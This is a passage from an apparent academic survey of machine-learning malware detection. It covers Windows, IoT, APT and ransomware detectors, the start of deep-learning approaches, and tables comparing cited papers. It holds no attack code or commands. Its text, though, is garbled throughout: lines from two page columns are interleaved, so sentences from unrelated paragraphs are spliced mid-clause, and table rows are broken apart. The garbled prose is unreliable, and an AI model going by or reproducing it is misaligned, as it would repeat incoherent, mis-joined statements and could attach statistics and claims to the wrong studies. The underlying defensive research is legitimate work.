them are not successful; however, they will affect the tasks by devices infect the entire security environment. IBM obtained 2nd
rebooting. Important features of iOS mobile malware detection place from 6th place in the first 10 manufacturing industries with
techniques are enumerated in Table 5. security breaches in 2019 where most popular companies like
Google, Oracle, Adobe, and Cisco are also on the list. For Adobe
5.3. Windows malware detection techniques Reader, more than 342 susceptible cases were registered. Com-
pared to the previous year in 2019, Windows trojan’s percentage
Based on the CVE database, over 660 official cases were has increased by 35% with a total of 64.31% of malwares. Besides,
recorded the previous year about the risks in the security of the ransomware, bots, crypto miners, and password Trojans are on
system [5]. Windows 10 OS is targeted for vulnerable attacks with the list of attacks.
a count of 357. Also, high levels of security breaches are identified Various detection methods are implemented for Windows
in Windows Server 2016 and Windows Server 2019. Considering malware. Anonymous malware detection in the Windows OS
the first quarter of 2020, Windows 10 is used by 51.38% around environment is achieved by implementing a malware detec-
the world. Windows 7 remains with 30% utilization despite its se- tion framework using active learning [181]. Support Vector Ma-
curity loopholes. The exploitation of Windows operating system chine classifier is utilized for classifying all anonymous malwares
vulnerabilities is the primary target for cybercriminals. Further into legitimate and malicious. Runtime environment anonymous
15
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

sample files are analysed and categorized by implementing a 5.4. IoT malware detection techniques
model that is employed both static and dynamic analysis tech-
niques [182]. Static analysis is used to analyse binary data with The prevalence of malware on linked Linux devices has dou-
the purpose of defining a feature module, and dynamic analysis bled in the IoT context. 57 million IoT malware attacks were
is used to determine behaviours. Resultants of both analyses are discovered in the first half of 2022, up 77% from the previous
used by ML classifiers to differentiate the sample as either benign half, according to a SonicWall analysis [57]. The growth curve of
or malicious. the malware development graph in the IoT environment is still
A hybrid analysis-based malware detection model is devel- rising [190]. More than 4 lakh samples were produced in 2019
oped for detecting botnets of 8 bits size in the work [183]. In which was nearly 2 lakhs in 2018. Trojans occupy the top place
the Windows OS environment, it aids in the detection of malware with 41.78% of the share in infection. Mirai malware is holding
samples by utilizing both static and dynamic analysis techniques. its first position in the top ten malware. It drew global attention
The article [184] proposes a model for Windows malware de- due to the catastrophic DDoS attack on major web services like
tection model by utilizing features like strings and n-grams. ML Twitter, Amazon, Dyn, Spotify, and the routers of Deutschland and
models are utilized for malware classification in the Windows OS Telekom. No awareness regarding this threat has been created by
environment, and features are retrieved by running files in the the producers of IoT devices. Mirai malware continued to create
run-time environment. A windows malware detection system is and spread botnets throughout 2019 [5].
implemented by utilizing a directory of dependent files of pre- Novel codes and techniques are injected to generate new
fetched files [185]. The minimum value of the false +ve rate samples like accessing the functions of Industrial IoT (IIoT). DDoS
is attained as 0.001. It is defined as a light-weighted malware attacks are applied by cyber thieves to exploit the loopholes in
detection method based on behaviours. For quick dynamic de- the security system. Crypto miners also target the unsecured in-
tection of malware, a framework namely a hybrid multi-filter is frastructure of IoT. New IoT malwares are generated as a result of
implemented to identify the behaviours of the runtime environ- these and make the defence of internet-connected devices ques-
ment [186]. Various hybrid algorithms are utilized by combining tionable. Gafgyt, a Trojan that ranks second globally with 15.04%
the filtering methods like low redundancy and fisher relief F of infections, and Tsunami and Hajime are also responsible for
score. SVM wrapper is used for increasing the relevance level. the destruction of IoT networks. Coinhive is a crypto miner that
To observe and identify strange risks related to energy con- targets IoT apps. Code written in JavaScript is utilized for com-
puting browser-oriented digital currency business services. With
servation, a power-aware malware detection framework is pro-
the comparison of 2020 results, sample counts have increased by
posed [187]. It is framed with a combination of a power monitor
46% from 2019 [5]. Machine learning is used in malware analysis
and data analyser. Power samples are collected, and energy con-
because it eliminates the need to acquire signatures for each type
sumption history is created by the power monitor wherein the
of malware for each detection technique, which aids in resolving
data analyser is utilized for power signature creation. By using
some complications. The Basic IoT malware detection method
noise-filtering and data-compression methods, power signatures
with the utilization of different ML classifiers is depicted in Fig. 7.
are produced, reducing the difficulty of detection. HP iPAQ is
Security-providing organizations implement two key methods
utilized for experimental purposes over the Windows OS mo-
for detecting malwares, which are matching the signatures and
bile environment. Malicious code analyser Cuckoo sandbox is
analysing based on heuristics [191]. The heuristic-based analysis
utilized for analysing malware samples [49] in a Windows OS
approach becomes less effective as it is evaded by the size of
environment where two distinct methodologies are deployed —
the IoT setup and utilization of approaches. An immediate de-
one for feature extraction and the other for behaviour analysis.
tection method is required for protecting the networks of IoT
Genetic algorithms are utilized for extracting features and for
without any delay [192]. IoT environment-related threats and
classification purposes, 3 classifiers are used — SVM, Naïve Bayes, deployment of tools, and techniques against attackers are detailed
and RF. This system attains classification accuracy with SVM at [193,194]. CNN is utilized for detecting IoT malware by trans-
81.3%, NB at 64.7%, and RF at 86.8%. ferring binaries into grayscale images [195]. Malware detection
Recently windows malware forensic analysis methods are pro- traffic is analysed using the Bayesian model updating method
posed without applying any ML techniques [188,189]. A compre- and the result is compared with ML classifiers like KNN and
hensive method is presented to renovate/retrieve vital informa- SVM [45]. The K-Means Clustering algorithm is utilized for finding
tion associated with malicious programs from different hidden the abnormality of the power indulgence prototype to detect IoT
locations of the windows system that expose the traces of ma- malware [196]. Machine learning classifiers have been utilized
licious programs using available remnants of a computer [188]. by multiple research communities to detect IoT malwares for the
Analysing procedures for various Windows 10 artefacts are of- past few years. Machine learning models are trained for malware
fered, as techniques for looking into the digital footprints of prediction by concentrating categorization over existing malware
suspect computers. Experiments are carried out for discovering samples [107] in which various methods utilized for choosing
the traces of deleted or existing malicious programs. Remote Ac- features are also detailed. Furthermore, classification algorithms
cess Trojan (RAT) families are studied comprehensively between like ANN, Decision Tree, and SVM are also discussed. Further, data
1996 and 2016 [189]. On the basis of the study RATSCOPE is privacy protection methods like secure offloading, access control
proposed which is a forensic system. It is capable of recording and and authentication are concentrated [197].
precisely reconstructing RAT attacks making use of the semantics A cross-platform approach to analysing IoT malware where
of windows in a fine-grained manner. A novel Aggregated API printable strings are first extracted from ELF files after IoT mal-
Tree Record Graph (AATR) model is proposed for classifying PHFs ware collection [198]. Printable strings are utilized as a cross-
of RATs by enhancing the performance and quality of intrinsic platform feature for identifying IoT malware over different plat-
Event Tracing for Windows (ETW). Test results of RATSCOPE beat forms. ML algorithms are incorporated to verify the ability of
earlier forensic systems by achieving 90% TPR (True Positive Rate) strings in the classification of malware families of cross-platform
over cross-family evaluation and 80% TPR over 2 years spanning environments. Based on the results, 99% accuracy is attained in a
temporal evaluation. Runtime overhead is gained as 3.7% which similar platform of training and testing with the data set which
is very low. Table 6 depicts the comparison of recent Windows contains 120k IoT malware executable files. For different IoT plat-
malware detection techniques using ML. forms, 96% accuracy is attained. A unified IoT malware detection
16
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Table 6
Comparison of recent Windows malware detection techniques using ML.
Research paper Features Type of malware Algorithms of classification
Yang et al. (2020) [189] AATR, ETW Windows RATSCOPE
D. S et al. (2020) [188] Footprints Windows comprehensive method
Irshad et al. (2019) [49] Cuckoo sandbox Windows SVM, Naïve Bayes, and RF
Huda et al. (2018) [186] Behaviours of a runtime environment Windows Hybrid-multi filter-wrapper framework, SVM wrapper
Alsulami et al. (2017) [185] Directory of dependent files Windows Lightweight behavioural malware detection
Mithal et al. (2016) [184] Strings and n-grams Windows ML
Satrya et al. (2015) [183] Malware behaviours Windows Hybrid analysis
Shijo et al. (2015) [182] Behaviours Windows ML
Nissim et al. (2014) [181] Active learning Windows SVM

Fig. 7. IoT Malware detection using ML classifiers.

method is proposed by focusing on the detection of IoT malware are involved for capturing, analysing and reporting in the time
at the node level as well as the network level [199]. For node- period of 7 months and better results are obtained.
level malware detection, a Lightweight runtime malware detector To detect DDoS attacks in IoT networks, SDN-based framework
is deployed which works with Hardware Performance Counter is proposed by using SDNWISE customized controllers [202].
(HPC) values. To resolve the malware imprisonment problem of
Other than IoT device vulnerabilities, malicious traffic of IoT net-
IoT networks, heuristic end-to-end detection and defence ap-
works is also investigated at an earlier stage by analysing packet
proaches are implemented. The scalability of network topology
is maintained making use of multi-attribute graph translation. logs employing the IP packet counter and IP payload detection
Recently without applying ML techniques, IoT-based secure approaches which are deployed over the SDNWISE controller.
patching framework (IoT-Proctor) is proposed with various net- Massive traffic between nodes is induced by configuring part
work isolation levels to moderate and control device-to-device of the model’s nodes in the COOJA simulator, which is used to
(D2D) malware propagation [200]. Identification of compromised develop software-defined IoT networks. While considering the
devices and malicious activity origin is performed using remote results of the DDoS attack detection framework, 98% accuracy and
attestation. In addition, virtual patching is proposed through 100% detection rate are attained with a low false +ve rate.
physical unclonable functions (PUFs) to avoid malware spread. To mitigate the critical impacts of IoT botnets, ML-based IDS
The SEIR (susceptible, exposed, infected, and resistant) model
is developed with the aim of accurate IoT botnet malware detec-
is utilized for representing the levels of isolation and perfor-
tion [203]. Feature set minimization is focused and implemented
mance evaluation. These types of studies are done using an
access control logic model, which reduces patching time and for ML tasks by formulating 6 distinct binary and multi-class
improves framework performance. Similarly another framework classification problems on the basis of botnet life cycle stages.
namely IoT-BDA is also developed without the involvement of ML For every classification problem, an optimal feature set is ob-
techniques. tained by applying filter and wrapper methods with chosen ML
IoT Botnet Detection and Analysis (IoT-BDA) framework is an methods. Based on experimentation results high detection rates
automated manner to capture, analyse, identify and report IoT are achieved in a restricted number of features and wrapper
botnets [201]. For providing support towards a broad range of methods outperform filter methods in terms of performance.
hardware and software configurations honeypots are integrated Channel-based features are preferred during the feature selection
with novel sandboxes in the framework. In addition, it involves stage of post-attack detection. N-BaIoT and Med-BIoT datasets are
discovering Indicators of Compromise (IoC) and Indicators of
used for the experimentation purposes. DT-based SBS (Sequential
Attack (IoA) with in-depth analysis by implementing the tech-
Backward Selection) offers excellent detection accuracy in a short
niques of anti-analysis, persistence and anti-forensics. The need
for multi-architecture botnet analysis is ensured because 52% of amount of time; for the N-BaIoT dataset with 9 class classification
the botnets are adopted with evading techniques for hiding C2 types, this accuracy was obtained at 99.57%. Table 7 compares the
communication and 67% of botnets are targeting several CPU ar- recent techniques implemented for Machine Learning based IoT
chitectures. For experimentation 4077 distinct IoT botnet samples malware detection.
17
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Table 7
Comparison of recent IoT malware detection techniques using ML.
Research paper Features Type of Algorithms of
malware classification
Kalakoti et al. (2022) [203] Botnet life cycle stage, wrapper methods, IoT ML based IDS
Channel based features
Bhayo et al. (2022) [202] DDoS attack, SDNWISE customized IoT SDN based framework
controllers, IP packet counter and IP
payload, COOJA simulator
Trajanovski et al. (2021) IoC and IoA, in-depth analysis, multi IoT IoT-BDA
[201] architecture botnet analysis
Aman et al. (2021) [200] Remote attestation, PUFs, SEIR model-based IoT malware IoT-Proctor
isolation
Dinakarrao et al. (2020) HPC values IoT malware Multi-attribute graph
[199] translation
Lee et al. (2020) [198] ELF files IoT malware ML algorithms
Wu et al. (2019) [45] Bayesian model IoT malware KNN and SVM
Papafotikas et al. (2019) K-Means Clustering IoT malware ML
[196]
Al-Asli et al. (2019) [191] Heuristics IoT malware ML
Pajouh et al. (2019) [192] Heuristics IoT malware two-tier classification
Azmoodeh et al. (2018) Power consumption prototypes IoT malware KNN
[204]
Xiao et al. (2018) [197] Control methods IoT malware ML
Su et al. (2018) [195] Images IoT malware CNN

5.5. APT detection techniques mechanisms based on sockets for authentication of indenting
legitimate users. SM4 is used for creating dynamic IP addresses
APT is a sophisticated stealthy threat actor which is a highly wherein the Viterbi algorithm-oriented timing selection method
vulnerable kind of threat that should be proactively avoided. is utilized dynamically. Issues on dynamic policy generation are
The most valuable information of legitimate users is targeted resolved by applying both of them. Dynamic policy allocation is
and creates financial issues for them. Various machine learning implemented by Dynamic Host Configuration Protocol Version
techniques are utilized for detecting advanced persistent threats. 6 (DHCPv6). At last, strategies are generated and policies are
MLAPT is implemented by detecting and forecasting APT with 3 assigned dynamically. For detecting APT-based malicious open
phases of execution [205]. The first phase involves the process of XML documents, an intelligent framework is proposed based on
detecting threats which are developed with 8 sub-modules that flexibility and ease of configuration [210]. Reports are generated
are utilized for analysing the traffic in a real-time environment. by highlighting information to analyse open XML documents
Alerts are correlated in the second phase where the results of without manual intervention. Configured scanner module pro-
the first phase are used to discover the alert’s type. In the final vides the detection of APT. 9376 execution logs retrieved from
phase, the attack is forecasted by using ML algorithms which 2010 APT campaign materials make up the APT-EXE dataset [211].
helps to detect the threat earlier. Based on the implementation Statistical analysis is applied to the APT-EXE dataset. It is applica-
results it attains maximum accuracy of 84.8% and a low false ble for detecting general Windows APTs. An optimized feature set
+ve rate is obtained. APT is a type of cyber attack that relies on is obtained by accessing locations, file types, and operations in a
targets to collect sensitive data using a bot. For detecting APT, loop. While testing 152 samples through campaigns in 2018 and
methods that utilize signatures are not capable. APT assessment is 2019, 0.7697 sensitivity is attained for detecting run-time events.
implemented in the Hadoop platform by creating a definite search To defend against APT attacks, a game theory-based model is pro-
machine [206]. Information related to HTTP logs, like cookies, posed [212] that resolves the issues related to APT attack paths.
are accessed to gain confidential information by bot-infected A network security defencive architecture is designed based on
systems. HTTP-based Command and control (C&C) is used for the analysis of the attack paths of attackers. Subsequently, using
securing the affected system. game theory as a foundation, the attack path prediction model
By combining the concepts of clustering and correlation to (OAPG) is developed and an APT instance assault is employed to
identify the system hosting the root infection, SPuNge is offered evaluate the model.
as a method for detecting APT [207]. The threat information APT attack on the basis of time synchronization is a dangerous
connected to the attack’s target and anticipated vulnerable be- threat [213]. To simulate that for security research purposes, two
haviours helps to identify the impending attack. Attacking spot devices are proposed which are a programmable Man-in-the-
is defined by mapping the information with K means. SPuNge Middle (pMitM) and a programmable injector (pInj). They allow
detects the collection of malware hyperlinks which are hav- the implementation of various kinds of attacks over Precision
ing similar domains. Domain graph-based APT detection scheme Time Protocol (PTP) networks for security research purposes.
is proposed over an information-centric IoT environment [208], On the basis of APT attack guidelines and emerging detection
where connections of malware-infected domains and the re- technology, an APT assault analysis framework has been pro-
spective address of IP are identified. To create domain graphs, posed [214] where collected data is repeatedly matched with
mostly connected subgraphs were used, and computation and manually built cyber security knowledge graphs. In order to link
consumption were kept to a minimum. Based on the results of new knowledge with past knowledge and provide real-time net-
experiments it provides better accuracy and is applicable for the work security status, the framework leverages self-defined rules.
IoT environment’s sensor networks. This framework involves a lot of manual activities, which could
An APT defence mechanism is proposed by analysing and cause human intervention errors that can be mitigated by im-
utilizing the concept of dynamic deception [209]. Messaging sys- plementing automation. An enhanced response system for APT
tem is implemented by applying both encryption and decryption is proposed [215] in which anomalous changes in the system are
18
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Table 8
Comparison of recent APTs detection techniques using ML.
Research paper Features Type of malware Algorithms of classification
Al-Saraireh et al. (2022) [218] ANOVA, 5 stages, variance feature selection method APT XGB based
Halabi et al. (2021) [217] IoV, optimal mixed strategy , DOBSS APT Bayesian Stackelberg Game
Yang et al. (2021) [216] SDN, game-theoretic problem, Nash equilibrium solution APT DBAR
Hong et al. (2021) [215] Changes in system APT AMHIDS,
Qi et al. (2020) [214] Self-define Rules and Mapreduce APT Cyber security knowledge graph
Alghamdi et al. (2020) [213] pMitM, pInj APT –
Su (2020) [212] APT attack paths APT Game theory, OAPG
Coulter et al. (2020) [211] APT-EXE APT –
Liu et al. (2019) [209] Socket based APT SM4 + Viterbi algorithm
Ma et al. (2019) [208] IP address APT Large-Scale Domain Graph
Sun et al. (2019) [210] Open XML documents APT Framework
Ghafira et al. (2018) [205] Traffic in a real-time environment APT MLAPT
Balduzzi et al. (2013) [207] K means APT SPuNge

monitored by developing a real-time Anti-Malware Host Intru- it is difficult to detect because of its invariance in the environ-
sion Detection system (AMHIDS). It is cost-effective in prevent- ment [219]. Implementing zero-day attack protection techniques
ing APT attacks while considering security measures related to is significant for automatic ransomware detection.
government operations. The system of anti-ransomware typically aims to avoid dam-
APT defence mechanism recently developed on the basis of age, protect against zero-day ransomware attacks, and raise user
data backup and recovery (DBAR) techniques [216] is imple- awareness. Ransomware is speculated to use evasion mecha-
mented to overcome the issues in the paradigm of software- nisms such as delayed execution, self-destruction, polymorphism,
defined networking (SDN) without employing ML techniques. and network traffic encryption [220]. Sharing malware payloads
It addresses the DBARS problem with the aim of identifying through simple actions like clicking on a malicious link or open-
cost-effective DBAR technique. To describe the evolution of the ing a spam email attachment would result in a ransomware
predicted security status associated with the network of organi- attack [221]. Due to the nature of ransomware, standard mal-
zations, a dynamic model is presented. Further the problem is ware detection methods are insufficient. Hence additional skill
enhancement is required.
reduced to a differential game-theoretic problem with the im-
Early indications of ransomware outbreak can be obtained
plementation of the Nash equilibrium solution concept to attain
with the use of CryptoDrop [219] since it keeps track of changes
cost-effective DBAR technique. The problem’s optimality system
to user files and data in a real-time environment. Specific file
is then derived using the Nash equilibrium solution notion.
systems-based attributes are recommended which are relevant
To optimize the defence system of IoV networks and model the
to most crypto miners. Primary and secondary indicators play a
interactions amid various kinds of attackers, a repeated Bayesian key role which is identified via extensive analysis of behaviour.
Stackelberg game is developed [217]. Distributed sophisticated Change in the file system, Hash similarities, and Shannon Entropy
attacks in the Internet of Vehicles (IoV) are investigated and the are the primary indicators, and file destroying and tunnelling are
severe impacts of APTs are highlighted. To predict the probability secondary terms. CryptoDrop attained a 100% of True Positive
of various attack types over the IoV network, risk assessment Rate (TPR), 1% of False Positive Rate (FPR) and 1–16 ms overhead
is implemented at RSU levels. Results obtained from the risk based on the results.
assessment phase are integrated by the game in order to create UNVEIL [222] creates an automatic virtual environment for
a defence system with optimal mixed strategy. To increase the imitating the environment of the user. For detecting ransomware
attack detection, an optimal Bayesian Stackelberg solver (DOBSS) two techniques are presented in UNVEIL which are file lock-
is utilized for solving the game. It aims to offer a solution for ers and screen lockers. File lockers focus on the files of the
balancing IoV’s defence workload while limiting service delivery victim’s system and file system accesses of the system are mon-
performance deterioration. itored. Screen lockers concentrate on ransomware which avoids
APT detection model is proposed on the basis of eXtreme system access and it relies on the dissimilarity scores of screen-
Gradient Boosting (XGB) and variance feature selection method- shots obtained from the system’s desktop analysis before, during,
based analysis [218]. A new dataset is created by considering the and after running the malware sample to find locked desktops.
various stages of APT like normal (stage 0), reconnaissance (stage Based on the experimental results, UNVEIL attained a 96.3% True
1), initial compromise (stage 2), lateral movement (stage 3) and Positive Rate at zero False Positives.
data exfiltration activity (stage 4). Further, strategies, procedures, R-Locker is based on the concept of deception where a honey
techniques and Indicators of Compromise (IoC) of APTs are also file trap is implemented in a FIFO manner to block ransomware
considered during dataset generation. The produced dataset is [223]. The maximum degree of dependency on the OS is consid-
then used to apply the suggested ML model. To choose the finest ered as its feature. It does not need pre-training and aims for
feature subset from the dataset, the ANOVA feature selection zero-day attacks. It is observed that based on results, R-Locker
achieved 100% TPR and 0% of FPR. The method for identifying
method is utilized. According to the obtained results, the accuracy
zero-day attacks is implemented by applying behaviour detection
score is attained as 99.89% by using 12 features alone among 65
and anomaly detection [224]. Classifiers such as SVM are utilized
features from the dataset. Table 8 depicts the summary of recent
for behaviour analysis and it generates predictions. The majority
APT detection techniques on the basis of Machine Learning.
voting strategy is used for merging the outcomes of classifiers
and OR logic is used for combining outcomes of anomaly-based
5.6. Ransomware detection techniques predictions. Experiment results depict 99% TPR and 2.4% FPR.
The ransomware detection method is implemented by utiliz-
Protection against ransomware is the most laborious task. ing the characteristics of human file handling as a whitelist and
Most ransomware attacks are targeted at naïve users who do it focuses on the dissimilarities between ‘‘humanness’’ and ‘‘ran-
not keep backup data and malicious users use these victims as somwareness’’ [225]. By prohibiting file deletion and overwrit-
a means of generating revenue [5]. Ransomware acts benign and ing, it avoided acquiring files encrypted by crypto-ransomware
19
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

and it is implemented for protecting text files. For encrypted impacted files are recovered by constructing a Flash Translation
ransomware, a context-aware entropy analysis-based detection Layer (FTL), which prevents the delay of ransomware detection
method is implemented [226]. It is discovered that the header but imposes an extra burden on SSD. According to experimental
fields of encrypted files of ransomware are having high entropy results, 100% TPR and 0%–5% FPR is attained.
compared to the normal legitimate file’s header and this informa- Grand Unified Regularized Least Square (GURLS) based method
tion is utilized for abnormal behaviour detection. 100% TPR and is proposed for ransomware detection which utilizes supervised
0% FPR are attained as results after experimentation. learning and Regularized Least Square algorithm [237]. Training
RWGuard is proposed for detecting crypto-ransomware over is performed by considering features like API call’s regularity
a real-time environment by utilizing 3 techniques of monitoring and strings; the adequate level of detection is provided when
namely trap monitoring, monitoring the changes of files, and combined with the Radial Basis Function kernel. Experimen-
monitoring the running processes [227]. To find changes in a tal results are provided as 87.7% TPR and 7.5% FPR. A Hybrid
file, the number of indicators are tracked, including entropy, android ransomware detection and mitigation method is pro-
patterns that are similar, and changes in the type and size of files. posed [238] where Opcode’s frequency is considered in static
The threshold value is computed based on those changes. While analysis whereas usage of memory, network, and CPU are consid-
classifying the samples into legitimate and malicious, profiling ered for dynamic analysis. 2-gram opcode frequencies are taken
is completed by considering the encryption behaviour. RWGuard as input for the binary classifier. TPR at 100% and FPR at 4% are
achieved 100% TPR, 0.1% FPR and 1.9 ms overhead according to attained as experimental results.
the results. R-PackDroid is meant for avoiding ransomware attacks in an-
ShieldFS [228], a runtime environment for a ransomware de- droid phones [239] where ML is employed with the consideration
tection system, utilizes classifiers based on supervised learning of API packs for feature extraction and Random Forest Classifier
making use of the input–output request packet obtained from is used for classifying distinct ransomware based on the training
benign and malicious systems. Two distinct models are developed results. R-PackDroid attained TPR and FPR of 97% and 2% respec-
for classification based on systems and processes. By involving tively. For IoT environments, the ransomware detection method
various levels of assessment of files, every classifier is trained. is implemented based on power consumption prototypes [204].
ShieldFS achieves 99%–100% TPR, 0–0.2% FPR, and 0.3–3.6x over- KNN provides a high level of detection accuracy with measures of
head dependent on results. To recover from the damages of time and similarities and 95.65% TPR is attained. It is suggested
ransomware, mitigation methods that guarantee data reliability that ransomware can be detected by looking for anomalies in file
and accessibility are put forward in the work [229] that observes directory activity [240]. Use of storage, use of processor and IO
the IRP of every user file. A mini-filter driver effectively prevents rates are also utilized. Testing is performed with single custom
hackers from having access to read or write files and experi- ransomware purposely developed for research.
mental results are attained as 100% TPR and 0% FPR. RedFish is By applying static analysis crypto-ransomware is detected
an algorithm that can identify ransomware activities and stop from the collection of malicious and benign files [241]. The
them from spreading to shared documents [230]. It is a network histogram density of opcodes is considered as the feature set and
traffic monitoring-based ransomware detection algorithm used the SMO classifier is incorporated along with WEKA. 95% TPR and
for analysing the traffic of the network. Basic activities of ran- 0%–5% FPR is attained as results. UShallNotPass [50] uses the con-
somware like modification of files by read or write operation, cept of encryption of random numbers used by ransomware and
content removing, or overwriting are monitored. Tracing infor- implements a security mechanism based on this. Most operating
mation on benign and malicious networks is utilized for training systems typically generate pseudo-random integers to increase
purposes. RedFish also attained the same results as previous work randomness. 94% TPR is attained after experimentation.
as 100% TPR and 0% FPR. Reinforcement learning is incorporated for anti-ransomware
SDN-based detection method by analysing the HTTP request testing [242] where a simulation environment is built by includ-
and response messages [231,232] is proposed where HTTP packing two main components. The first component of ransomware
ets are extracted and pre-processed by the traffic analyser of simulates an attack, while the second component of ransomware
HTTP which reconstructs the information of the server, size, and detects an attack. RL agent is introduced in order to attack op-
IP. The ransomware detection method is proposed by mixing timally by obfuscating the detector and then the user’s target
the features of both static and dynamic analysis [233]. In static files are encrypted. It will be helpful for identifying the loopholes
analysis, the concept of deception of the file is implemented by of anti-ransomware defence and overcoming them before the
placing trigger programs with honey files in an artificial net- occurrence of real-time attack.
work. Additionally, network packets are observed and features Sequential Pattern Mining based feature identification and ML-
are mined from the header of packets to create a dataset for based classification are combined together for detecting
malicious behaviour detection. NetConverse employs Machine ransomware [243]. The environment is set by collecting the
Learning techniques by utilizing the information of network traf- activity log samples of 517 locky ransomware, 535 Cerber ran-
fic [234] in which a Decision Tree classifier is used to trace somware and 572 TeslaCrypt ransomware. Maximal Frequent
the parameters of the ransomware-affected system. NetConverse Patterns (MFP) are discovered using Sequential Pattern Mining
attained 95% TPR and 1%–6% FPR. among various ransomware families. J48, Random Forest, Bagging
Security measures are designed to guard against ransomware and MLP algorithms are used for classification. The accuracy
attacks on flash-based storage devices [235]. The type of ran- of ransomware detection is achieved at 99% in this method.
somware is discovered by pattern-based detection. Ransomware An adaptive pre-encryption crypto ransomware early detection
activities are monitored by tracking the operations like read- model is proposed by combining the concepts of pre-encryption
ing and writing of files with the help of the policy of buffer and crypto-ransomware population drift [244]. It provided a rem-
management. To protect the ransomware attacks in Solid State edy for the shortcomings of the earlier models with the help of
Drive (SSDs) based on NAND flash, a security approach is imple- precise pre-encryption boundary definition. This model’s adapt-
mented [236]. For determining the precise details of ransomware, ability feature has up-to-date information on attack behaviour,
features including the address of the block, its size, and the types which will be useful in identifying polymorphic ransomware.
of IO requests it makes are taken into consideration. Binary DT Ransomware detection framework Autonomous Backup and
with ID3 is utilized for the detection of ransomware. Additionally, Recovery (AMOEBA) is proposed which is based on content [245].
20
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

It provides solutions at the device level and extra backup storage and behaviours for evaluating the maliciousness of programs. It
is not required. AMOEBA depends on two main components facilitates communication between cyber security experts and
which are the hardware accelerator and fine-grained backup ransomware knowledge-based systems and also identifies sensi-
mechanism. For high-speed ransomware detection, content- tive areas for investigation. Evaluation is performed with several
based detection algorithms are executed with the help of hard- measures like clarity, consistency, modularity, richness and cov-
ware accelerators. The space overhead of data backup is reduced erage of the inheritance. Table 9 provides a summary of recent
by a fine-grained backup control mechanism. In addition, it is ransomware detection techniques.
prototyped with the OpenSSD platform.
In order to perform ransomware detection and classification, 6. Deep learning based malware detection techniques
the DNAact-Ran method is proposed by using ML [246]. Digital
DNA Sequences computation is established with the help of algo- 6.1. Sandboxing based malware detection
rithms like MOGWO and BCS and also Digital DNA sequencing
design constraints and k-mer frequency vector are utilized by 6.1.1. Static analysis based malware detection techniques
DNAact-Ran. On the basis of the digital genome, the uniqueness Automatic malware detection in the work [252] is accom-
of ransomware is identified and ransomware is classified into plished using the deep learning approach on the basis of static
well-known families. The performance of the proposed method analysis. It consists of two components: a feature extraction tech-
is evaluated with the evaluation metrics such as precision, recall, nique and a deep learning model. Grayscale images and OpCode
f-measure and accuracy over 582 ransomware instances and 942 3-gram are combined to extract features of the malware. The
goodware instances. Proposed method attained 87.9% detection feature set is used for training purposes by the deep learning
accuracy which depicts better results when compared with ML model. A deep feedforward neural network is used for classifying
algorithms like Naïve Bayes, Decision Stump and AdaBoost. benign and malware [58].
For detecting IoT ransomware attacks, the Intrusion Detection Deep Learning Framework for Intelligent Malware Detection
Honeypot (IDH) is developed by utilizing Social Leopard Algo- (DL4MD) extracts API calls of malware libraries for learning [31].
rithm (SoLA) [247]. IDH is comprised of Honeyfolder, Audit Watch API call references of size 32 bits are extracted using a database.
and Complex Event Processing (CEP). The Honey folder acts as a These features are given as input for DL4MD architecture which
trap and prior warning system while suspicious file activities are is based on stacked autoencoders. In the work [27], Convolutional
encountered where SoLA is utilized. In Audit Watch, the entropy Neural Network is employed for the classification of binaries into
of files and folders is verified. Finally, the CEP engine cumulates disassembled byte codes. Further processes are applied to the
the data of various security systems and the behaviour and attack raw disassembled code for feature generation. Instructions of X86
pattern of ransomware are confirmed. This proposed design is processors of different lengths are extracted to set features the
validated with more than 20 ransomware variants. Experimental disassembled code is parsed to extract features. With the features
results depict better results than existing systems in terms of of a linear support vector machine, a deep learning model is im-
precision, recall and accuracy. plemented in which cross-entropy loss is reduced [253]. The use
To combat smart healthcare-based ransomware attacks, of SoftMax is replaced by L2-SVMs, which displays better results
Blockchain-Enabled Security Framework (BSFR-SH) is proposed over famous datasets of deep learning like MNIST and CIFAR-10.
[248]. Security analysis is conducted in BSFR-SH and proved It produces an error rate of 11.9% which is comparatively better
its security against ransomware attacks. BSFR-SH comprises 5 than CNN with SoftMax. CNN-BiLSTM model [85] is entirely a
phases. In the first phase, healthcare data backups are generated data-driven method for feature extraction.
via blockchain. Blockchain-based data collection and signature Grayscale graphics are used to represent malicious software
generation are performed in the second phase. In the third phase, because they can be used to detect differences since they can cap-
ML is applied for ransomware detection and analysis. Blockchain- ture subtle changes while preserving the overall structure [77].
based ransomware mitigation and data recovery are implemented The MalImg dataset and the Microsoft Malware Classification
in the fourth and fifth phases respectively. While comparing Challenge dataset are used as benchmarks to assess the feasibility
the performance with other existing schemes, BSFR-SH provides of the approach. Similarly, by highlighting the fact that most
better results in terms of accuracy and F1-score. variations of the malware are created using standard obfuscation
A multi-feature and multi-classifier network-based system techniques so the compression and encryption algorithms retain
(MFMCNS) is proposed to detect Ransomwares [249]. Wannacry some attributes inherent in the original code, a file-agnostic deep
and NotPetya Ransomwares are considered for providing com- learning strategy for classifying malware is presented [78]. With
plete behavioural analysis of the network traffic of Ransomwares. the use of the data supplied by Microsoft for the BigData Innova-
On the basis of session and time flow levels, two sets of 21 tors Gathering Anti-Malware Prediction Challenge, it enables the
related features are extracted and every set is included with an discovery of discriminative patterns that practically all variants
independent classifier by utilizing the majority voting rule. On in a family share. A file-independent end-to-end deep learning
the basis of results, detection accuracy is obtained as 99.88% and method is suggested for classifying malware from raw byte se-
99.66% for the session and time-based classifiers respectively. On quences without the use of manually created features [75]. It
the basis of file sharing traffic analysis, a security tool is pro- has two essential parts: a denoising autoencoder that discovers
posed for detecting and blocking crypto-ransomwares [250]. ML a hidden representation of the binary content of the malware,
techniques are utilized for monitoring traffic and traffic patterns and a dilated residual network that serves as a classifier. The
related to ransomware activities are identified during file reading experiments perform admirably, classifying malware into families
and overwriting. Features are extracted on the basis of activities with almost 99% accuracy.
which include opening, closing and altering files. For training and A holistic multi-dimensional deep learning framework is im-
testing purposes, above 70 ransomware binaries of 33 distinct plemented in the work [79] to classify IoT malware and family
strains are used. False positive rate and encrypted file information attribution by using Deep Learning architectures. Static features
are considered as parameters for validating algorithms. of executable binaries are extracted and used in the format of
